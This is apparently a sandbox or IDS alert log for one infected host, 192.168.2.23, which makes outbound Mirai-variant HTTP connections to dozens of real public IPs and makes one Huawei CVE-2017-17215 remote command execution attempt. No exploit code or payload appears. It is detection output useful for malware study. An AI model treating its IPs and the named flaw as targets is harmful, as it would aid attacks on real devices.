Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.57.117.85

Timestamp:	192.168.2.2395.57.117.8556186802839471 05/27/22-12:31:15.088619
SID:	2839471
Source Port:	56186
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.159.47.27

Timestamp:	192.168.2.2395.159.47.2739312802839471 05/27/22-12:31:19.910781
SID:	2839471
Source Port:	39312
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 88.12.46.218

Timestamp:	192.168.2.2388.12.46.21853806802839471 05/27/22-12:31:23.930863
SID:	2839471
Source Port:	53806
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.101.14.207

Timestamp:	192.168.2.2395.101.14.20760674802839471 05/27/22-12:33:11.611379
SID:	2839471
Source Port:	60674
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 88.80.20.160

Timestamp:	192.168.2.2388.80.20.16059264802839471 05/27/22-12:31:31.124184
SID:	2839471
Source Port:	59264
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 88.129.59.54

Timestamp:	192.168.2.2388.129.59.5441168802839471 05/27/22-12:31:54.808552
SID:	2839471
Source Port:	41168
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.179.162.82

Timestamp:	192.168.2.2395.179.162.8249118802839471 05/27/22-12:32:12.671842
SID:	2839471
Source Port:	49118
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.154.232.180

Timestamp:	192.168.2.2395.154.232.18054160802839471 05/27/22-12:31:19.786814
SID:	2839471
Source Port:	54160
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.100.210.113

Timestamp:	192.168.2.2395.100.210.11343142802839471 05/27/22-12:31:56.914233
SID:	2839471
Source Port:	43142
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 88.247.209.76

Timestamp:	192.168.2.2388.247.209.7656418802839471 05/27/22-12:32:44.011426
SID:	2839471
Source Port:	56418
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.101.78.215

Timestamp:	192.168.2.2395.101.78.21536224802839471 05/27/22-12:32:22.566529
SID:	2839471
Source Port:	36224
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.111.194.231

Timestamp:	192.168.2.2395.111.194.23152466802839471 05/27/22-12:31:33.671458
SID:	2839471
Source Port:	52466
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 88.99.242.252

Timestamp:	192.168.2.2388.99.242.25248898802839471 05/27/22-12:32:00.067857
SID:	2839471
Source Port:	48898
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.58.239.156

Timestamp:	192.168.2.2395.58.239.15650468802839471 05/27/22-12:32:19.018154
SID:	2839471
Source Port:	50468
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.101.174.10

Timestamp:	192.168.2.2395.101.174.1043504802839471 05/27/22-12:33:58.075621
SID:	2839471
Source Port:	43504
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 88.221.148.46

Timestamp:	192.168.2.2388.221.148.4654120802839471 05/27/22-12:31:23.853653
SID:	2839471
Source Port:	54120
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.38.192.99

Timestamp:	192.168.2.2395.38.192.9948692802839471 05/27/22-12:31:34.995858
SID:	2839471
Source Port:	48692
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.143.188.168

Timestamp:	192.168.2.2395.143.188.16843516802839471 05/27/22-12:31:45.547396
SID:	2839471
Source Port:	43516
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 88.221.77.15

Timestamp:	192.168.2.2388.221.77.1557238802839471 05/27/22-12:33:39.992640
SID:	2839471
Source Port:	57238
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 88.99.222.195

Timestamp:	192.168.2.2388.99.222.19559234802839471 05/27/22-12:31:17.577531
SID:	2839471
Source Port:	59234
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.58.157.177

Timestamp:	192.168.2.2395.58.157.17757174802839471 05/27/22-12:31:38.540240
SID:	2839471
Source Port:	57174
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.74.142.34

Timestamp:	192.168.2.23112.74.142.3459320802839471 05/27/22-12:31:23.802886
SID:	2839471
Source Port:	59320
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.100.186.177

Timestamp:	192.168.2.2395.100.186.17755934802839471 05/27/22-12:31:19.783764
SID:	2839471
Source Port:	55934
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.197.186.69

Timestamp:	192.168.2.23112.197.186.6934232802839471 05/27/22-12:34:15.264649
SID:	2839471
Source Port:	34232
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 88.99.225.193

Timestamp:	192.168.2.2388.99.225.19342160802839471 05/27/22-12:31:43.544055
SID:	2839471
Source Port:	42160
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 88.213.207.4

Timestamp:	192.168.2.2388.213.207.446980802839471 05/27/22-12:31:48.561691
SID:	2839471
Source Port:	46980
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.58.167.13

Timestamp:	192.168.2.2395.58.167.1339100802839471 05/27/22-12:31:17.554715
SID:	2839471
Source Port:	39100
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.169.212.140

Timestamp:	192.168.2.2395.169.212.14050382802839471 05/27/22-12:33:09.361075
SID:	2839471
Source Port:	50382
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.122.156.191

Timestamp:	192.168.2.23112.122.156.19160710802839471 05/27/22-12:32:09.446158
SID:	2839471
Source Port:	60710
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.181.216.134

Timestamp:	192.168.2.2395.181.216.13439360802839471 05/27/22-12:33:56.676376
SID:	2839471
Source Port:	39360
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.217.39.110

Timestamp:	192.168.2.2395.217.39.11039044802839471 05/27/22-12:31:34.961644
SID:	2839471
Source Port:	39044
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.165.103.75

Timestamp:	192.168.2.23112.165.103.7553042802839471 05/27/22-12:32:06.956682
SID:	2839471
Source Port:	53042
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 88.198.210.20

Timestamp:	192.168.2.2388.198.210.2041554802839471 05/27/22-12:33:48.061475
SID:	2839471
Source Port:	41554
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.111.247.191

Timestamp:	192.168.2.2395.111.247.19134022802839471 05/27/22-12:31:33.249723
SID:	2839471
Source Port:	34022
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.56.134.41

Timestamp:	192.168.2.2395.56.134.4155198802839471 05/27/22-12:33:43.132577
SID:	2839471
Source Port:	55198
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.143.218.151

Timestamp:	192.168.2.2395.143.218.15158842802839471 05/27/22-12:31:34.920579
SID:	2839471
Source Port:	58842
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.56.25.177

Timestamp:	192.168.2.2395.56.25.17758708802839471 05/27/22-12:33:11.671020
SID:	2839471
Source Port:	58708
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.45.117.152

Timestamp:	192.168.2.23112.45.117.15235872802839471 05/27/22-12:32:22.616897
SID:	2839471
Source Port:	35872
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 88.225.240.206

Timestamp:	192.168.2.2388.225.240.20647174802839471 05/27/22-12:32:00.123619
SID:	2839471
Source Port:	47174
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.139.131.71

Timestamp:	192.168.2.2395.139.131.7156624802839471 05/27/22-12:31:19.900307
SID:	2839471
Source Port:	56624
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.70.237.15

Timestamp:	192.168.2.23112.70.237.1542186802839471 05/27/22-12:32:16.418537
SID:	2839471
Source Port:	42186
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.100.48.238

Timestamp:	192.168.2.2395.100.48.23837696802839471 05/27/22-12:33:40.977680
SID:	2839471
Source Port:	37696
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.173.178.4

Timestamp:	192.168.2.2395.173.178.449408802839471 05/27/22-12:32:07.017851
SID:	2839471
Source Port:	49408
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 88.152.159.96

Timestamp:	192.168.2.2388.152.159.9645460802839471 05/27/22-12:32:18.787691
SID:	2839471
Source Port:	45460
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.217.143.50

Timestamp:	192.168.2.2395.217.143.5041066802839471 05/27/22-12:31:38.463113
SID:	2839471
Source Port:	41066
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.206.140.206

Timestamp:	192.168.2.23112.206.140.20648232802839471 05/27/22-12:33:29.276621
SID:	2839471
Source Port:	48232
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.48.170.103

Timestamp:	192.168.2.23112.48.170.10346806802839471 05/27/22-12:31:51.437308
SID:	2839471
Source Port:	46806
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.111.251.31

Timestamp:	192.168.2.2395.111.251.3158270802839471 05/27/22-12:34:13.924270
SID:	2839471
Source Port:	58270
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.216.138.204

Timestamp:	192.168.2.2395.216.138.20456560802839471 05/27/22-12:32:06.997755
SID:	2839471
Source Port:	56560
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.217.64.216

Timestamp:	192.168.2.2395.217.64.21642418802839471 05/27/22-12:31:38.463136
SID:	2839471
Source Port:	42418
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.164.219.100

Timestamp:	192.168.2.2395.164.219.10052268802839471 05/27/22-12:32:07.060866
SID:	2839471
Source Port:	52268
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 88.221.139.173

Timestamp:	192.168.2.2388.221.139.17341446802839471 05/27/22-12:31:15.018641
SID:	2839471
Source Port:	41446
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 88.221.111.27

Timestamp:	192.168.2.2388.221.111.2735636802839471 05/27/22-12:31:25.170536
SID:	2839471
Source Port:	35636
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 88.221.196.100

Timestamp:	192.168.2.2388.221.196.10042160802839471 05/27/22-12:31:29.023462
SID:	2839471
Source Port:	42160
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 88.103.173.67

Timestamp:	192.168.2.2388.103.173.6754636802839471 05/27/22-12:34:17.807413
SID:	2839471
Source Port:	54636
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.47.1.173

Timestamp:	192.168.2.23112.47.1.17334512802839471 05/27/22-12:32:15.868522
SID:	2839471
Source Port:	34512
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.200.243.93

Timestamp:	192.168.2.23112.200.243.9341862802839471 05/27/22-12:33:05.511661
SID:	2839471
Source Port:	41862
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 88.203.6.129

Timestamp:	192.168.2.2388.203.6.12952030802839471 05/27/22-12:31:45.486116
SID:	2839471
Source Port:	52030
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.197.186.69

Timestamp:	192.168.2.23112.197.186.6934662802839471 05/27/22-12:34:29.593435
SID:	2839471
Source Port:	34662
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.181.161.188

Timestamp:	192.168.2.2395.181.161.18833806802839471 05/27/22-12:32:12.680954
SID:	2839471
Source Port:	33806
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 88.211.83.72

Timestamp:	192.168.2.2388.211.83.7245092802839471 05/27/22-12:31:54.800343
SID:	2839471
Source Port:	45092
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 88.87.4.51

Timestamp:	192.168.2.2388.87.4.5151120802839471 05/27/22-12:31:15.092894
SID:	2839471
Source Port:	51120
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.179.180.152

Timestamp:	192.168.2.2395.179.180.15238212802839471 05/27/22-12:33:30.964976
SID:	2839471
Source Port:	38212
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 88.87.26.25

Timestamp:	192.168.2.2388.87.26.2551386802839471 05/27/22-12:31:15.092875
SID:	2839471
Source Port:	51386
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 88.34.44.172

Timestamp:	192.168.2.2388.34.44.17258598802839471 05/27/22-12:32:45.075473
SID:	2839471
Source Port:	58598
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 88.221.111.27

Timestamp:	192.168.2.2388.221.111.2735596802839471 05/27/22-12:31:23.848429
SID:	2839471
Source Port:	35596
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.163.5.179

Timestamp:	192.168.2.23112.163.5.17945500802839471 05/27/22-12:31:23.584004
SID:	2839471
Source Port:	45500
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 88.86.215.220

Timestamp:	192.168.2.2388.86.215.22060880802839471 05/27/22-12:31:43.521931
SID:	2839471
Source Port:	60880
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.121.174.27

Timestamp:	192.168.2.23112.121.174.2733836802839471 05/27/22-12:32:12.885897
SID:	2839471
Source Port:	33836
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.211.189.109

Timestamp:	192.168.2.23112.211.189.10935672802839471 05/27/22-12:33:05.551569
SID:	2839471
Source Port:	35672
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.139.246.106

Timestamp:	192.168.2.2395.139.246.10660628802839471 05/27/22-12:31:00.389921
SID:	2839471
Source Port:	60628
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.245.178.8

Timestamp:	192.168.2.2395.245.178.853938802839471 05/27/22-12:32:18.853740
SID:	2839471
Source Port:	53938
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.211.85.79

Timestamp:	192.168.2.23112.211.85.7945736802839471 05/27/22-12:32:52.261918
SID:	2839471
Source Port:	45736
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.226.61.130

Timestamp:	192.168.2.2395.226.61.13044442802839471 05/27/22-12:33:05.595447
SID:	2839471
Source Port:	44442
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.196.112.113

Timestamp:	192.168.2.23112.196.112.11338078802839471 05/27/22-12:34:26.100254
SID:	2839471
Source Port:	38078
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.216.47.233

Timestamp:	192.168.2.2395.216.47.23354886802839471 05/27/22-12:32:06.997849
SID:	2839471
Source Port:	54886
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.213.212.189

Timestamp:	192.168.2.2395.213.212.18938108802839471 05/27/22-12:31:06.389031
SID:	2839471
Source Port:	38108
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.213.45.92

Timestamp:	192.168.2.23112.213.45.9234744802839471 05/27/22-12:31:23.654056
SID:	2839471
Source Port:	34744
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 88.255.55.215

Timestamp:	192.168.2.2388.255.55.21546638802839471 05/27/22-12:31:48.630707
SID:	2839471
Source Port:	46638
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) - Source IP: 192.168.2.23 - Destination IP: 41.0.91.127

Timestamp:	192.168.2.2341.0.91.12739528372152835222 05/27/22-12:34:12.220909
SID:	2835222
Source Port:	39528
Destination Port:	37215
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 88.216.103.158

Timestamp:	192.168.2.2388.216.103.15835942802839471 05/27/22-12:31:42.389093
SID:	2839471
Source Port:	35942
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.131.160.144

Timestamp:	192.168.2.2395.131.160.14457636802839471 05/27/22-12:32:36.982308
SID:	2839471
Source Port:	57636
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.35.79.54

Timestamp:	192.168.2.23112.35.79.5439488802839471 05/27/22-12:32:12.893316
SID:	2839471
Source Port:	39488
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.57.29.123

Timestamp:	192.168.2.2395.57.29.12344802802839471 05/27/22-12:33:01.063137
SID:	2839471
Source Port:	44802
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 88.250.68.225

Timestamp:	192.168.2.2388.250.68.22540434802839471 05/27/22-12:34:17.873487
SID:	2839471
Source Port:	40434
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 88.109.137.162

Timestamp:	192.168.2.2388.109.137.16250830802839471 05/27/22-12:32:53.097961
SID:	2839471
Source Port:	50830
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 88.221.205.11

Timestamp:	192.168.2.2388.221.205.1139676802839471 05/27/22-12:32:22.952163
SID:	2839471
Source Port:	39676
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.172.108.68

Timestamp:	192.168.2.23112.172.108.6844012802839471 05/27/22-12:31:26.456649
SID:	2839471
Source Port:	44012
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.101.65.181

Timestamp:	192.168.2.2395.101.65.18134938802839471 05/27/22-12:34:15.279681
SID:	2839471
Source Port:	34938
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.74.184.160

Timestamp:	192.168.2.23112.74.184.16060202802839471 05/27/22-12:31:46.274302
SID:	2839471
Source Port:	60202
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 88.24.129.161

Timestamp:	192.168.2.2388.24.129.16135668802839471 05/27/22-12:34:17.895514
SID:	2839471
Source Port:	35668
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.129.208.236

Timestamp:	192.168.2.2395.129.208.23659430802839471 05/27/22-12:32:22.558579
SID:	2839471
Source Port:	59430
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.14.5.224

Timestamp:	192.168.2.23112.14.5.22450654802839471 05/27/22-12:32:06.968249
SID:	2839471
Source Port:	50654
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.213.102.197

Timestamp:	192.168.2.23112.213.102.19753180802839471 05/27/22-12:31:40.096566
SID:	2839471
Source Port:	53180
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.197.186.69

Timestamp:	192.168.2.23112.197.186.6934428802839471 05/27/22-12:34:21.537072
SID:	2839471
Source Port:	34428
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 95.151.147.37

Timestamp:	192.168.2.2395.151.147.3752382802839471 05/27/22-12:31:33.320284
SID:	2839471
Source Port:	52382
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 88.225.231.241

Timestamp:	192.168.2.2388.225.231.24140972802839471 05/27/22-12:33:30.985507
SID:	2839471
Source Port:	40972
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 112.72.58.127

Timestamp:	192.168.2.23112.72.58.12757136802839471 05/27/22-12:31:00.709407
SID:	2839471
Source Port:	57136
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

ETPRO TROJAN Mirai Variant User-Agent (Outbound) - Source IP: 192.168.2.23 - Destination IP: 88.203.6.129

Timestamp:	192.168.2.2388.203.6.12952022802839471 05/27/22-12:31:42.372374
SID:	2839471
Source Port:	52022
Destination Port:	80
Protocol:	TCP
Classtype:	Web Application Attack

